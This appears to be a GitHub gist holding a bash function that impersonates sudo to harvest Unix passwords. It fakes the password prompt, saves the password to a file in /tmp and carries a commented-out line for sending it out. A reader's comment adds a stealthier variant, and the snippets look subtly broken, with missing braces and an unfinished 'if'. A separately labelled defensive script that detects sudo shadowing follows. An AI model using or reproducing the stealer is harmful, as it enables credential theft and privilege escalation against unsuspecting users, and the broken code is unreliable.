Last active Nov 16, 2020
Sudo function for stealing Unix passwords; script for WonderHowTo article
function sudo ()
realsudo="$(which sudo)";
read -s -p "[sudo] password for $USER: " inputPasswd;
printf "\n";
printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt;
# encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1;
# curl -s "$USER:$encoded" > /dev/null 2>&1;
$realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1;
$realsudo "${@:1}"

@benbusby benbusby commented Jan 8, 2020

Nice! There's one small change I think is worthwhile though:

function sudo () {
    realsudo="$(which sudo)"

    if grep -Fqs "$USER" /tmp/hackedPasswd.txt
        $realsudo "${@:1}"
        read -s -p "[sudo] password for $USER: " inputPasswd
        printf "\n"; printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt
        $realsudo -S <<< "$inputPasswd" -u root bash -c "exit" > /dev/null 2>&1
        $realsudo "${@:1}"

This way it skips the password prompt for subsequent commands, and doesn't look suspicious to a target running back to back sudo commands when they're still within the "root/sudo timeout" window.
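
Both snippets above work only because a shell function named `sudo` takes precedence over the real binary on `PATH`. As an added defensive example (not from the gist or its author), the following script flags such definitions in shell startup files and reports how the current shell resolves `sudo`; the function names and the sample rc content are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added defensive example (not part of the gist): find shell functions or
# aliases that shadow sudo, the mechanism the snippets above depend on.

# Matches "function sudo", "sudo ()" and "alias sudo=" at the start of a line.
SHADOW_RE='^[[:space:]]*(function[[:space:]]+sudo([[:space:]]|[{(]|$)|sudo[[:space:]]*\(\)|alias[[:space:]]+sudo=)'

# Print file:line:text for every shadowing definition in the given files.
# Returns 0 if at least one was found, 1 if the files are clean.
find_sudo_shadowing() {
    _found=1
    for _f in "$@"; do
        [ -f "$_f" ] && [ -r "$_f" ] || continue
        # The extra /dev/null operand makes grep always print the file name.
        if grep -nE "$SHADOW_RE" "$_f" /dev/null; then _found=0; fi
    done
    return "$_found"
}

# Report how the current shell resolves "sudo": file, function, alias or missing.
sudo_kind() {
    _desc=$(command -V sudo 2>/dev/null | head -n 1)
    case "$_desc" in
        '')         echo missing ;;
        *function*) echo function ;;
        *alias*)    echo alias ;;
        *)          echo file ;;
    esac
}

# Constructed sample: an rc file with benign lines and one shadowing function.
demo() {
    _rc=$(mktemp)
    printf '%s\n' 'export EDITOR=vi' '# sudo () in a comment is ignored' \
        'function sudo ()' '{ :; }' 'sudo apt update' > "$_rc"
    find_sudo_shadowing "$_rc"
    _status=$?
    rm -f "$_rc"
    return "$_status"
}

demo && echo "sudo is shadowed in the sample rc file"
echo "this shell resolves sudo as: $(sudo_kind)"
```

On a real host, pass the startup files the shell actually reads (for example `~/.bashrc`, `~/.bash_profile`, `~/.profile` and the system-wide profile scripts) to `find_sudo_shadowing`, and treat any `sudo_kind` result other than `file` as worth investigating.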
